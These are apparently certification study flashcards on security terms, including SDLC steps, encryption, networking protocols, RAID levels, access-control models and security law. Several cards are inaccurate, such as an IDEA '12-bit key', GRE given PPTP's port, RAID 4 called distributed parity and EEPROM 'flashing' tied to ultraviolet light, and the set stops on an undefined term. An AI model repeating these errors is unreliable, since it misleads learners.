Title 18 U.S.C. Section 242
Deprivation of Rights Under Color of Law
Operations Security
Concerns systems and data. About people, data, media, and hardware; all of which are elements that need to be considered from a security perspective
NIST SDLC Step 3
Conduct a Sensitivity Assessment: Look at the security sensitivity of the system and the information to be processed.
OCTAVE Phase 3
Conducts the Risk Analysis. Develops Risk Mitigation Strategy.
True Positive Example
Conficker worm is spreading on a trusted network, and NIDS alerts
False Negative
Conficker worm is spreading on a trusted network, and NIDS is silent
Object(Labels)
Confidential, Secret, Top Secret. EO 12356
CIA
Confidentiality, Integrity, Availability
CCB
Configuration Control Board - Establishment of and charter for a group of qualified people with responsibility for the process of controlling and approving changes throughout the development and operational lifecycle of products and systems
Real Evidence
Consists of tangible or physical objects. USB Storage, DVDs, Hard Drives, Printed Business Records.
Basic Input Output System(BIOS)
Contains code in firmware that executed when a PC is powered on. It first runs Power-On Self-Test(POST)
Motherboard
Contains hardware. Firmware, Memory slots, CPU, etc.
CDN
Content Delivery Networks. Akamai, Amazon CloudFront, CloudFlare. CDNs also increase availability and can reduce the effects of denial of service attacks. 75-140ms range, but it can be significantly higher, especially for mobile users accessing a site over a 3G network
NIST SP 800-34
Contingency Planning Guide for Federal Information Systems
COBIT
Control Objectives for Information and related Technology is a control framework for employing information security governance best practices within an organization. Provides IT Governance Model.
***EXAM WARNING***
Control types on the exam, do not memorize examples: instead look for the context. Firewall is a good example of a preventative control. A lock is a good example of a preventive physical control
COCOM
Coordinating Committee for Multilateral Export Controls. In effect from 1947 to 1994. Charter COCOM members include, Japan, Australia, Turkey, and much of the rest of the non-Soviet controlled countries.
Single Loss Expectancy (SLE)
Cost of One Loss
Common SQL Commands
Create, Select, Delete, Insert, Update
Spiral Model
Created by Barry W. Boehm. The model creates a risk-driven approach to the software process rather than a primarily document-driven or code-driven process
The TCP/IP Model
Created by DARPA in the 1970s. The formal name is the Internet Protocol Suite.
Wassenaar Arrangement
Created in 1996, relaxed many restrictions on exporting cryptography.
CER
Crossover Error Rate describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal.
CIRP
Cyber Incident Response Plan is designed to respond to disruptive cyber events, including network-based attacks, worms, computer viruses, Trojan horses, etc.
Fire Class D
D:Combustible Metals -Magnesium -Zinc -Calcium -Titanium -Lithium
Discretionary Access Control
DAC gives subjects full control of objects they have created or been given access to, including sharing the objects with other subjects
Data Query Languages
DDL(Data Definition Language) DML(Data Manipulation Language)
Direct Sequence Spread Spectrum
DSSS uses the entire band at once, "spreading" the signal throughout the band
DCE
Data Circuit Terminating Equipment. A device that networks DTEs, like a router. DCE marks the end of ISP's network. DTE is responsibility of customer.
DES
Data Enceyption Standard. Standard symmetric cipher developed in 1976. Created due to lack of cryptographic standard.IBM designed it, based it on Lucifer(old symmetric cipher) ***DESCRIBES DEA***
Types of Integrity
Data Integrity and System Integrity
DTE
Data Terminal Equipment. Any type of network connected user machine(terminal)
Metadata
Data about data
Unconstrained Data Item (UDI)
Data that does not require integrity. Assurance is based upon integrity verification procedures (IVPs) that ensure that data are kept in a valid state.
Remanence
Data that persists beyond noninvasive means to delete it
DBA
Database Administrators
DBMS
Database Management System
Database Shadowing
Database shadowing uses two or more identical databases
Restore/Rollback(Databases)
Databases can rollback/restore to a prior restore point
Address Space Layout Randomization
Decreases likelihood of successful exploitation by making memory addresses employed by the system less predictable. When developing exploits and building post-exploitation capabilities. Leverages existing code executions to prevent exploitation. Not guaranteed.
DARPA
Defense Advanced Research Projects Agency
Outsiders
Defined as unauthorized attackers with no authorized privileged access to a system or organization.
Demarc
Demarcation Point. The point where the DTE and DCE meet. ISP Responsibility Ends and Customers begins. Circuit uses "clock signal." both sides must synchronize to a clock signal provided by DCE.(Channel Service UNIT/CSU)
DMZ
Demilitarized Zone Network. Network servers receiving traffic from untrusted netwrosk should be placed on the DMZ networks. Assumption that any host may be comprised must be a reality. A classic DMZ uses two firewalls vs. Single Firewall DMZ( 3-Legged DMZ)
Denial-of-Service Attacks
Denial-of-Service attacks work by simply polluting the wireless spectrum with noise
SSH
Designed as a secure replacement for Telnet, FTP, and the UNIX "R" commands (rlogin, rshell, etc). Provides confidentiality, integrity, and secure authentication. S("SSH")FTP, SCP(Secure Copy) for transferring files. SSH listens on port 22.
Government clouds
Designed to keep data and resources geographically contained
Wireless Application Protocol
Designed to provide secure Web services to handheld wireless devices such as smart phones. WAP is based on HTML, and includes HDML (Handheld Device Markup Language). A WAP browser is a microbrowser, simpler than a full Web browser, and requiring fewer resources
Reformatting
Destroys original FAT and replaces it with a new one. both cases data remains and can be recovered. Writing 0's or random characters.
IAB Practice 4
Destroys the integrity of computer-based information
Degaussing
Destruction of magnetic media using other magnets. Ensures integrity is affected.
Detection
Detection (also called identification) is the phase in which events are analyzed in order to determine whether these events might comprise a security incident
NIST SDLC Step 5
Determine Security Requirements: Determine technical features (like access controls), assurances (like background checks for system developers), or operational practices (like awareness and training).
Asymmetric Encryption
Diffie Hellman key exchange in 1976. RSA algorithm was invented in 1977(Rivest, Shamir, Adleman). Mathematical Breakthrough. Uses two keys. If you encrypt with one key, you may decrypt with the other. Also called public key encryption. Publicly posted key. Once encrypted the same key cannot be used to decrypt. Only the private key can do so. Used for digital signature. Asymmetric methods use one-way functions.
DSL
Digital Subscriber Line use existing copper pairs to provide digital service to homes and small offices. Speeds 10 mb or more. SDSL(Symmetric), ADSL(Asymmetric), VDSL(Very High Rate), and HDSL(High Data Rate)
DSSS
Direct Sequence Spread Spectrum uses the entire band at once, "spreading" the signal throughout the band.
Real Memory
Directly accessible by the CPU and is used to hold instructions
Opposing Forces to CIA
Disclosure(Confidentiality), Alteration(Integrity), Destruction(Availability)
TCSEC Division C
Discretionary Protection mean Discretionary Access Control systems(DAC) Includes class C1(Discretionary Security Protection) and C2(Controlled Access Protection).
Guidelines
Discretionary, useful pieces of advice, such as "to create a strong password."
NIST SDLC Step 16
Disposal: The secure decommission of a system.
SDLC 10
Disposition
IAB Practice 2
Disrupts the intended use of the Internet
RIP
Distance Vector Routing Protocol. Uses hop count as metric. Does not have full view of the network; lacks convergence
DNP3
Distributed Network Protocol provides an open standard used primarily within the energy. Provides interoperability between various vendors' SCADA and smart grid applications. Scene in US Department of Energy
First Normal Form (1NF)
Divide data into tables.
****EXAM WARNING****
Do not confuse Service Oriented Architecture (SOA) with SOAP. Different concepts.
Need to know
Does the user "need to know" the specific data they may attempt to access? More granular than least privelage.
Ethics
Doing what is morally right. i.e Hippocratic Oath. Treat sensitive information ethically.
DNSSEC
Domain Name Server Security Extensions provides authentication and integrity to DNS responses via the use of public key encryption
Acquisitions
Due diligence requires a thorough risk assessment of any acquired company's information security program.
Object Reuse Attacks
Dumpster Diving, Recovering Info from Unallocated Blocks on a Disk Drive. Cleaning and destruction should follow a formal policy.
ITSEC/TCSEC Ratings
E0: D F-C1, E1: C1 F-C2, E2: C2 F-B1, E4: B1 F-B2, E4: B2 F-B3, E5: B3 F-B3, E6: A1 Additional functionality ratings: F-IN: High integrity requirements AV: High availability requirements DI: High integrity requirements for networks DC: High confidentiality requirements for networks DX: High integrity and confidentiality requirements for networks See: http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf
E Carriers
E1s are dedicated 2.048-megabit circuits E3, 16 E1s to form a 34.368 megabit circuit
EAP-TTLS
EAP Tunneled Transport Layer Security;dropping the client-side certificate requirement, allowing other authentication methods (such as password) for client-side authentication
EAP-FAST
EAP-Flexible Authentication via Secure Tunneling; was designed by Cisco to replace LEAP. It uses a Protected Access Credential (PAC), pre-shared key.
Types of EAP
EAP-MD5, LEAP, EAP-FAST, EAP-TLS, EAP-TTLS, and PEAP
EAP-TLS
EAP-Transport Layer Security. ses PKI, requiring both server-side and client-side certificates. Costly
Common Criteria: Levels of Evaluation
Each builds on the level of in-depth review of the preceding level EAL1: Functionally tested EAL2: Structurally tested EAL3: Methodically tested and checked EAL4: Methodically designed, tested, and reviewed EAL5: Semi-formally designed, and tested EAL6: Semi-formally verified, designed, and tested EAL7: Formally verified, designed, and tested.
Bus Topology
Each node inspects the data as it passes along the bus.
EMI
Electromagnetic Interference. Improperly shield cable, and circuits may suffer cross talk from EMI. Mitigated via proper cable management.
5 Modes of DES
Electronic Code Book(ECB) Cipher Block Chaining(CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter Mode (CTR) ECB is the original mode. CBC, CFB, and OFB were later added. NIST Special Pub 800-38a
EEPROM
Electronically Eraseable Progrmamable Read Only Memory) may be "flashed," or erased and written to multiple times. "flashing" comes from ultraviolet light.
NonInterference Model
Ensures that data at different security domains remain separate from one another.
Antivirus
Employ heuristic or statistical methods for malware detection. Detection predominantly means of detecting malware is still signature based. Not good for Zero Day.
High Availability Clusters
Employs multiple systems that are already installed, configured, and plugged in, such that if a failure causes one of the systems to fail then the other can be seamlessly leveraged to maintain the availability of the service or application being provided.
ESP
Encapsulating Security Payload provides confidentiality by encrypting packet data.
Single DES
Encrypting 64 bits blocks of 56 bit key. Weak to brute force.
Symmetric Encryption
Encryption that uses one key to encrypt an decrypt
EULA
End-User License Agreements can be in paper or electronic form
Endpoint Security
Endpoints are the targets of attacks, preventive and detective capabilities on the endpoints themselves provide a layer beyond network-centric security devices.
EPROM
Erasable Programable Read Only Memory may be "flashed," or erased and written to multiple times.
CWE:Directory Path Traversal
Escaping from the root of a web server(such as/var/www) into the regular file system by referencing directories such as ".../..."
Evidence Integrity
Evidence must be reliable during the course of it's acquisition and analysis. Checksums ensure no data changes ocurred. One-way hashes(MD5, SHA-1) are commonly used.
Agile Software Development
Evolved as a reaction to rigid software development models The Agile Manifesto: • Individuals and interactions over processes and tools • Working software over comprehensive documentation • Customer collaboration over contract negotiation • Responding to change over following a plan"
Hierarchical Databases
Ex: the global Domain Name Service(DNS) servers form a global tree. The root name servers are the "root zone" at the base of the tree; individual DNS entries for the leaves.
***EXAM Warning***
Exam strongly prefers open over proprietary standards/protocols. CISCO's EIGRP is not open.
SSL, IPsec VPN
Examples of protocols used forencrypting data in motion.
XP
Extreme Programming ensures communication, simplicity, feedback, respect, and courage through: -Planning: specifies the desired features -Paired programming: programmers work in teams. -Forty-hour workweek: -Total customer involvement -Detailed test procedures(Unit Test)
False Accept Rate
FAR occurs when an unauthorized subject is accepted by the biometric system as valid. Also called a Type II error.
Broadcast MAC
FF:FF:FF:FF:FF:FF
Broadcast Address
FF:FF:FF:FF:FF:FF. Communications sent by commputers via this address will reach other computers but not server's VLANS. InterVLAN communication requires Layer 3 routing.
Frequency Hopping Spread Spectrum
FHSS. For sending traffic via a radio band. Minimize interference.
False Reject Rate
FRR occurs when an authorized subject is rejected by the biometric system as unauthorized. Also called a Type I error
Claude Shannon
Father of information security
FIdM
Federated Identity Management applies Single Sign On (SSO) on a much wider scale. Cross Organization to Internet. May use OpenID or SAML (Security Association Markup Language)
Examples of Physical Access Control
Fences, Gates, Lights, Cameras, Locks, Mantraps, and Guards.
FTP
File Transfer Protocol. Has no confidentiality or integrity. Ports 20(Originates), 21(Data transfer). Many firewalls will block Active FTP data.
Firewalls
Filter traffic between networks. TPC/IP packet filter and stateful firewalls make decisions based on Layer 3, and 4. Multihomed. Multiple NICS connected to multiple different networks.
15:FIN
Finish a connection (gracefully)
Kaiser Permanente 2009
Fired/Disciplined over 20 workers for violating policy (and possibly violating regulations such as HIPAA) for viewing Nadya Sulemans's (Octomom) medical records without a need to know.
Heat Detectors
For when temperature exceeds an established safe baseline
Forensic Media Analysis
Forensic data typically comes from binary images of secondary storage and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, and possibly associated cellular phones and mp3 players
FHSS
Frequency Hopping Spread Spectrum for sending traffic via a radio band. Designed to maximize throughput. Uses a number of small frequency channels throughout the band
GPL
GNU Public License • The freedom to use the software for any purpose, • The freedom to change the software to suit your needs, • The freedom to share the software with your friends and neighbors, • The freedom to share the changes you make.
802.1X Authentication
Generally bundled with additional security functionality such as: patch verification, antivirus signatures and definitions.
GRE
Generic Routing Encapsulation to pass PPP via IP, and uses TCP for a control channel (using TCP port 1723)
Enigma
German Cipher Machine
Binary Backup Tools
Ghost (when run with specific non-default switches enabled) AccessData's FTK Guidance Software's EnCase.
GAN
Global Area Network, a global collection of WANs
GIG
Global Information Grid is the U.S. Department of Defense (DoD) global network, one of the largest private networks in the world
Chosen/Adaptive Plaintext Attack
Goal of deriving key. Usually launched against asymmetric crypto systems. Mirrors chosen plaintext attack in round 1
Environmental Controls
HVAC and Power are crucial factors that can impact server room security if not carefully maintained.
White hat hackers
Hackers who act legally and within the bounds of the law. Also known as ethical hackers
Blackhats
Hackers with who act maliciously
RAID 2
Hamming Code. Not considered commercially viable for hard disks and is not used. Require either 14 or 39 hard disks and a specially designed hardware controller. Cost prohibitive
Shredding
Hard- Copy Sensitive Information needs to be shredded prior to disposal. Cross Cut Shredding is preferred.
Dual Homed Host
Has two network interfaces. One connected to a trusted network and the other connected to a untrusted network
HAVAL
Hash of Variable Length is a hashing algorithm that creates message digests of 128,160,192,224.
HMAC
Hashed Message Authentication Code. Combines a shared key with Hash. IPsec uses HMAC
Combination locks
Have dials that must be turned to specific numbers. shared Combos is a security concern
x86 CPU
Have four rings. But most use rings 0 and 3 only.
Centralized Logging
Having logs in a central repository allows for more scalable security monitoring and intrusion detection capabilities
Task
Heavy Weight Process(HWP)
Security assessments
Holistic approach to assessing the effectiveness of access control. The goal is to broadly cover many other specific tests, to ensure that all aspects of access control are considered.
HIDS
Host-based Intrusion Detection Systems process information within the host. Tripwire protects system integrity by detecting changes to critical operating system files.
HIPS
Host-based Intrusion Prevention Systems process/block/permit information within the host.
HTTPS
Hypertext Transfer Protocol Secure transfers encrypted Web-based data via SSL/TLS(443)
HTTP
Hypertext Transfer Protocol used to transfer unencrypted Web-based data(80)
Two Basic Routing Protocols.
IGP: Interior Gateway Protocols EGP: Exterior Gateway Protocols.
IKE
IPsec can use a variety of protocols(MD5, TDES, AES, Etc) for confidentiality Internet Key Exchange negotiates the algorithm selection process. Two sides of IPsec tunnel usually use IKE to negotiate.
Tunnel Mode
IPsec can use either. Tunnel mode is used by security gateways p2p tunnels. ESP tunnel encrypts entire packets
IPsec vs. SSL
IPsec makes fundamental changes to IP networking and the OS while SSL does not
IPsec
IPv4 has no built-in confidentiality. higher-layer protocols such as TLS are used to provide security
***Exam Warning***
ISC2 Code of Ethics is highly testable. You may be asked for the "best" ethical answer, when all answers are ethical, per the canons.
OCTAVE Phase 1
Identifies staff knowledge
OCTAVE Phase 2
Identifies vulnerabilities
Tailoring Process: 1
Identify and designate common controls in initial security control baselines
AAA
Identity and Authentication, Authorization, and Accountability
Identity
Identity is a claim that you are a specific person. "I am Person X." Identities must be unique
(IDaaS)
Identity is a required pre-condition to effectively manage confidentiality, integrity, and availability. Leverage cloud service for identity management.
SDLC 8
Implementation
NIST SDLC Step 8
Implementation: The system is tested and installed.
Countermeasures
Implemented to mitigate attacks. Multiple overlapping control spanning across multiple domains. Enhance and support each other.
TRIM command
Improves garbage collection. Trim is an attribute of the ATA Data Set Management Command. TRIM improves compatiability, endurance, and performance of drives.
Stateful Firewalls
Include state table that allows the firewall to compare current packets to previous ones. Slower than packet filters but far more secure. Will deny fraudulent packets based on previous state table entries.
ISC2 Code of Ethics
Includes the Preamble, Canons, and Guidance. Preamble(Intro), Canons(Mandatory), Guidelines(Advisory)
NIST SDLC Step 6
Incorporate Security Requirements Into Specifications: Ensure that the previously gathered information is incorporated in the project plan.
ITIL
Information Technology Infrastructure Library is a framework for providing best services in IT Service Management(ITSM). 5 Core Guidance Pubs 1. Service Strategy 2. Service Design 3. Service Transition 4. Service Operation 5. Continual Service Improvement
ITSEC
Information Technology Security Evaluation Criteria (ITSEC). First International Evaluation Model. Separates Functionality from Assurance. 2 types of Assurance: effectiveness(Q) and correctness(E)
NIST SDLC Step 17
Information: Information may be moved to another system, archived, discarded, or destroyed.
Iaas
Infrastructure as a Service
CMM
Initial Repeatable Defined Managed Optimizing
SDLC 1
Initiation
NIST SDLC Step 2
Initiation: The need for a system is expressed and the purpose of the system is documented
NIST SDLC Step 9
Install/Turn-On Controls: A system often comes with security features disabled. These need to be enabled and configured.
IDE
Integrated Drive Electronics Disk Drive
ISDN
Integrated Services Digital Network. Digital Subscriber Line n earlier attempt to provide digital service via "copper pair". ISDN Basic Rate Interface (BRI) service provides two 64K. PRI (Primary Rate Interface) provides twenty-three 64K channels. Both have a 16K signaling channel. Sucked
SDLC 7
Integration and Test
Mesh topology
Interconnects network nodes to each other. Have superior availability
IGP
Interior Gateway Protocols RIP OSPF (Layer 3)
Private Sector Labels
Internal Use Only and Company Proprietary
IDEA
International Data Encryption Algorithm. Symmetric block cipher designed as internation replacement to DES. Uses 12-bit key and 64-bit block size. Patent encumberance and slow speed are problems.
ICMP
Internet Control Message Protocol, a helper protocol that helps Layer 3
IPsec
Internet Protocol Security. A sutie of protocols that provide a cryptographic layer to both IPv4 and IPv6. Provides VPNs(Virtual Private Networks) Includes two primary protocols Authentication Header (AH), Encapsulating Security Payload(ESP). Provide similar functions. Sometimes IPsec has ISAKMP and IKE. IPsec is overly complex. Complexity is the Enemy of security
Contract Acceptance testing
It is performed against the contract's acceptance criteria for producing custom developed software.
Purple
Japanese encryption device
Privilege Monitoring
Job functions that warrant greater scrutiny include: account creation/modification/deletion, system reboots, data backup, data restoration, source code access, audit log access, security configuration capabilities, etc.
Fire Class K
K: Cooking Media -Veggie Oil -Animal Oils -Fats/Lards
Thread
Light Weight Process(LWP)
LDAP
Lightweight Directory Access Protocol provides a common open protocol for interfacing and querying directory service information provided by network operating systems. Port 389 via TCP
Switcha
Like a bridge but with more than two ports. Best practice to only connect one device per switch. Provide traffic isolation by associating the MAC address of each computer and server with its port. Shrinks collision domains
Narrow Scope
Limited Knowledge of asset that is being tested.
Linear Cryptanalysis
Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large amounts of plaintext/ciphertext pairs created with the same key
/etc/shadow
Linux stores hashes for passwords here
LAN
Local Area Network is a comparatively small network, typically confined to a building or an area
Crime(Site Selection)
Local crime rates are factored into site selection
Boot Sector
Located after POST is complete
Lockpicking
Lock picking is the art of opening a lock. All key locks can be picked or bumped
Phisher
Malicious attackers who sends emails out to many people infecting computers with malware to steal information.
System Owner
Manager responsible for the actual computers that house data. Ensure the hardware is physically secure, OS's are patched up-to-date.
TCSEC Division B
Mandatory Protection. Means Mandatory Access Control systems(MAC). Includes classes B1(Labeled Security Protection), B2 (Structured Protection) and B3(Security Domains). *Higher numbers are more secure.
CWE: SQL Injection
Manipulation of a back-end SQL server voa a front-end web server.
Remote meeting technology
Many of these solutions are designed to tunnel through outbound SSL or TLS traffic, which can often pass via firewalls and any Web proxies
***EXAM WARNING***
Many organizations will opt for not implementing rotation of duties because of the cost associated with implementation. For the exam, be certain to appreciate that cost is always a consideration, and can trump the implementation of some controls.
Non-Disclosure Agreement(NDA)
Methods require that employees or other persons privy to business confidential information do not disclose to, or work for competitors in an unauthorized manner
MTD = RTO + WRT
Maximum Tolerable Downtime = Recovery Time Object + Work Recovery Time
MTD
Maximum Tolerable Downtime which describes the total time a system can be inoperable before an organization is severely impacted. Also MAD, MTO, and MAO
Disk Encryption/Decryption
May occur in software or hardware. Software-based solutions may tax the computer's performance, while hardware-based solutions offload the cryptographic work onto another
MTTR
Mean Time to Repair describes how long it will take to recover a specific failed system.
Convergence
Means providing services such as industrial controls, storage and voice. Via Ethernet and TCP/IP.
MAN
Metropolitan Area Network is typically confined to a city, a zip code, a campus, or office park
NIST SDLC Step 18
Media Sanitization: There are three general methods of purging media: overwriting, degaussing (for magnetic media only), and destruction.[22]
Offline Media Storage
Media Storage Facilities are necessary for disaster recovery, potential legal proceedings, or other matters. Facility should be far enough removed from primary to avoid impact.
Reference Monitor
Mediates all access between subjects and objects
Reference Monitor
Mediates all access between subjects and objects. It enforces the system's security policy. Prevents normal user from wrting to a restricted file, like the system password file. Eg: Mandatory Access Control (MAC), reference prevents secret > top secret.
***EXAM WARNING***
Memorizing the specific steps of each SDLC is not required, but be sure to understand the logical (secure) flow of the SDLC process.
Memory Addressing
Memory values may be stored in CPU Registers, and General RAM. (Memory Location #YYYY, #ZZZZ)
Hashdump
Metasploit command that dumps password hashes from memory.
***EXAM WARNING***
Microsoft trust relationships fall into two categories: non-transitive and transitive. Non-transitive trusts only exist between two trust partners. Transitive trusts exist between two partners and all of their partner domains.
TCSEC Division D
Minimal Protection. This divison describes TCSEC-evaluated systems that od not meet the requirements of higher divisions
MOR
Minimum Operating Requirements describe the minimum environmental and connectivity requirements in order to operate computer equipment.
RAID 1
Mirrored Set perhaps the simplest of all RAID levels to understand. RAID 1 creates/writes an exact duplicate of all data to an additional disk.
Cisco
Multifunction device/chassis that can act as a router, switch, firewall, NIDS, etc. ***Exam will reference dedicated vs. multifunction***
Compartmented
Mode of operation where all subjects accessing the system have the necessary clearance but do not have the appropriate formal access approval nor need to know for all information in system. Objects are placed into compartments.
Microkernels
Modular kernels. A microkernel is usually smaller and has less native functionality than a typical monolithic kernel. Added functionality via Loadable Kernel Modules(LKM). Running modules in user mode(ring 3)
Fingerprints
Most widely used biometric control available today. Smartcards can carry fingerprint information. Fingerprint minutiae, specific details of fingerprint friction ridges
MD5
Most widely used, created by Ronal Rivest. Creates 128 bit hash value based on any input length. MD6 is newest version, published in 2008
Second Normal Form (2NF)
Move data that is partially dependent on the primary key to another table
RAT
Remote Access Trojan
MPLS
Multiprotocol Label Switching. rovides a way to forward WAN data via labels
S/MIME
Multipurpose Internet Mail Extensions. Provided standard format for email including characters, sets, and attachments. S/MIME leverages PKI to encrypt and authenticate MIME-encoded email. Eg: S/MIME gateway.
Users
Must follow the rules. Must comply with mandatory policies, procedures, standards, etc.
Service Set Identifier
Must know the SSID before joing a LAN
Walls and Doors
NFPA fire resistant rating shall no be less than one hour.
Normal Response Mode
NRM can transmit when given permission by the primary
Count-Down Timers
Needs to be both visible and audible
First Octet
Network
Components of Penetration Test
Network (Internet) Network (internal or DMZ) War dialing Wireless Physical (attempt to gain entrance into a facility or room)
NAC
Network Access Control: network device based solution supported by vendors including, CISCO
NAP
Network Access Protection: computer operating system based solution by Microsoft.
NAT
Network Address Translation is used to translate IP addresse. Translate RFC1918 addresses as they traverse from intranet to the Internet. NAT hides the origin of a packet. Source address is the gateway
Promiscuous Network Access
Network Intrusion Detection Systems run in promiscuous mode. Normally requires super user access.
Types of Logs: Network Security Software/Hardware:
Network Security Software/Hardware: • Antivirus logs • IDS/IPS logs • Remote Access Software (such as VPN logs) • Web proxy • Vulnerability management • Authentication servers • Routers and firewalls
Types Of IDS/IPS
Network-based and host-based.
Microsoft NTFS Permissions
New Technology File System Read Write Read and Execute Modify Full Control (all encompassing)
Process States
New: process being created Ready: process waiting to e executed by the CPU Running: process being executed by the CPU Blocked: waiting for I/O Terminate: a completed process Zombie: Child process whose parent process is terminated.
FE-13
Newest substitute. Can be breathed
Social Engineering
No tech hacking. Uses Human Mind. An example of a social engineering attack combined with a client-side attack is emailing malware with a Subject line of "Category 5 Hurricane is about to hit Florida!"
Electronic Discovery
Pertains to legal counsel gaining access to pertinent electronic information during the pre-trial discovery phase of civil legal proceedings
Diskless Workstation
Normal POST, Loads TCP/IP Stack, and downloads kernel and OS using protocol like BOOTP or DHCP
Password policy compliance
Notifying users to change their passwords before they expire
Annual Rate of Occurrence(ARO)
Number of Losses per Year
OLE
Object Linking and Embedding is a way to link documents to other documents.
Java
Object Oriented Programming Language. Bytecode is platform independent and is run/interpreted on the Java Virtual Machine (JVM).
Quantitative Analysis
Objective analysis of hard numbers and assets. AV, EF, SLE are all examples of quantitative quantities.
Bell-LaPadula Model
Observes two rules. Simple Security Property and Security Property. Focused on maintaining the confidentiality of objects.
NISTSDLC Step 7
Obtain the System and Related Security Activities: May include developing the system's security features, monitoring the development process itself for security problems, responding to changes, and monitoring threats.
OEP
Occupant Emergency Plan provides coordinated procedures for minimizing loss of life and injury
CWE: Buffer Overflow
Occurs when a programmer does not perform bounds checking
Tailgating
Occurs when an unauthorized person follows an authorized person into a building after unlock/authenticating. Often combined with social engineering.
X.25
Older. X.25 provided a cost-effective way to transmit data over long distances in the 1970s through early 1990s
One Time Pad
One Time Key. Discarded after one use. Provably unbreakable form of crypto.
Limitation of Overwriting
One cannot tell if a drive has been securely overwritten by simply looking at it. Errors made during overwriting can lead to data exposure.
California Senate Bill 1386 (SB1386)
One of the first US state level breach notification laws. Requires organizations suffering a personal data breach to notify customers of the potential disclosure.
Simplex
One way communication
OCSP
Online Certificate Status Protocol. Replacement for CRLs, and uses client server. Scales better than CRLs
Incremental
Only archive files that have changed since the last backup of any kind was performed. EX: On Monday's backup, only those files that have been changed since Sunday's backup will be marked for backup
OSPF
Open Shortest Path First is a link state routing protocol that learns the entire network topology for their "area". Send event driven updates.
Master Key
Opens any lock for a given security zone in a building
Circuit Level Proxies
Operate at Layer 5(Session Layer). SOCKS is the most popular Circuit Level Proxy. TCP Port 1080. App;ications need to be configured to support SOCKS.
NIST SDLC Step 12
Operation/Maintenance: The system is modified by the addition of hardware and software and by other events.
NIST SDLC Step 14
Operational Assurance: Examines whether a system is operated according to its current security requirements.
OPEX
Operational Expense. Routers and Switches OPEX is low. NIDS, NIPS, and AV are high.
OCTAVE
Operationall Critical Threat, Asset, and Vulnerability Evaluation, a risk management framework from Carnegie Mellon University. Describes a three-phase process for managing risk.
ROM Chips
PROM, EPROM, and EEPROM.
Pen Test Methodology
PRSVER Planning Reconnaissance Scanning Vulnerability Assessment Exploitation Reporting
10:URG
Packet contains urgent data
IP Fragmentation
Packet exceeds the Maximum Transmission Unit (MTU), Router may fragment it. Fragmentation breaks a large packet into multiple smaller packets
PAP
Password Authentication Protocol. A very weak authentication protcol. Sends UN and PW in clear text.
PAP
Password Authentication Protocol. Defined by RFC 1334. A user enters a password and it is sent across the network in clear text
Cain & Abel
Password cracker application
Exposure Factor(EF)
Percentage of Asset Value Lost
PAN
Personal Area Networks range of 100 meters or much less. Low-power wireless technologies such as Bluetooth use PANs
Site Selection***EXAM WARNING***
Physical Safety of Personnel is a top priority
Deterrent Control Examples
Physical: "Beware of Dog" sign, Light Technical: Warning Banner at Login Administrative: Sanction Policy
Detective Control Examples
Physical: CCTV, Light Technical: IDS Administrative: Post-employment random drug tests
Preventive Control Examples
Physical: Lock, Mantrap Technical: Firewall Administrative: Pre-employment drug screening.
Bastian Host
Placed on the Internet that is not protected by another device(firewall.) Hardened to protect self.
Syslog(Unencrypted)
Plaintext over UDP 514. The most widely used logging subsystem. Unreliable and connectionless UDP as a transport protocol for logs has implications for ensuring continuity of logging.
SDLC 3
Planning
Inline NIPS
Plays the role of a layer 3-7 firewall by passing or allowing traffic. NIPS provides defense in depths
PPTP
Point-to-Point Tunneling Protocol tunnels PPP via IP
Security Control
Policies, procedures, and other administrative controls Assessing the real world-effectiveness of administrative controls Change management Architectural review Penetration tests Vulnerability assessments Security Audits.
Port Controls
Ports that may allow copying data to or from a system. Large amounts of information can be placed on a device small enough to evade perimeter contraband checks. Lock ports. EG: Directory Group Policy, Enterprise level port controls.
Collisions
Possible plaintexts is larger than the number of possible hashes. When things have the same fixed length hash.
Lessons Learned
Post-incident activity. Provide a final report on the incident, which will be delivered to management
POST
Power-On Self-Test. Performs basic tests, including verifying the integrity of the BIOS, Testing the memory, Identifying devices, other tasks.
Background checks
Pre-Employment Screening
NIST SDLC Step 1
Prepare a Security Plan; Ensure that security is considered during all phases of the IT system life cycle
PGP
Pretty Good Privacy. Whole Disk Encryption for data at rest
Processes
Processes communicate between the rings via system calls.
3 Types of Policy
Program Policy, Issue-Specific- and System-Specific Policy.
Components of Program Policy
Purpose, Scope, Responsibilities, Compliance.
12:PSH
Push data to application layer
Compensating
Put in place to compensate for weaknesses in other controls. i.e surfing explicit web sites would be a cause for an employee to lose his/her job.
Raid Levels
RAID 0: Striped Set RAID 1: Mirrored Set RAID 3: Byte Level Striping with Dedicated Parity RAID 4: Block Level Striping with Distributed Parity. RAID 5: Block Level Striping with Distributed Parity RAID 6: Block Level Striping with Double Distributed Parity
IAB's Ethics and the Internet
RFC 1087; published 1987. Practices considered unethical behavior if someone purposefully committed.
IGPs
RIP OSPF
Real-time Transport Protocol
RTP. Common VoIP protocol. VoIP is based on data.
RFID
Radio Frequency Identification used to create wirelessly readable tags for animals or objects. Eg: Faraday Wallet/ Cage
RAD
Rapid Application Development rapidly develops software via the use of prototypes, "dummy" GUIs, back-end databases, and more.
Third normal Form
Remove data that is not dependent on the primary key. [35]
Stateless Autoconfiguration
Removes the requirement for DHCP
Linux/UNIX permissions
Read("r") Write("w") Execute("x") May be set separately to the owner, group, or world.
Fourth Amendment
Reasonable Search and Seizure
Repeater
Receives bits on one port and repeats them out the other port. (No Security)
Repeater
Receives bits on one port, repeats on another
Whole Disk Encryption
Recommended for ensuring confidentiality. Partial encryption, such as encrypted files folders or partitions, often risk exposing sensitive data stored in temporary files.
Watchdog Timer
Recover a system by rebooting after critical processes hang or crash
RPO
Recovery Point Objective is the amount of data loss or system inaccessibility (measured in time) that an organization can withstand
RTO
Recovery Time Objective describes the maximum time allowed to recover business or IT systems
Caller ID
Requires calling from the correct phone number. Caller ID can be easily forged
Inference
Requires deduction: there is a mystery to be solved and lower level details provide the clues.
Sarbanes-Oxley Act of 2002 (SOX)
Requires disclosure, auditor independence, and internal security controls. i.e risk assessment. Intentional violation of SOX can result in criminal charges.
Gramm-Leach-Bliley Act (GLBA)
Requires fianncial institutions to protect the confidentiality and integrity of consumer financial information. Forced them to notify consumers of their privacy practices.
Database Security
Requires security precautions, inference controls and polyinstantiation
13:RST
Reset (tear down) a connection
General DRP
Respond Activate Team Communicate Assess Reconstitution
Cryptanalysis
Science of breaking encrypted
Steganography
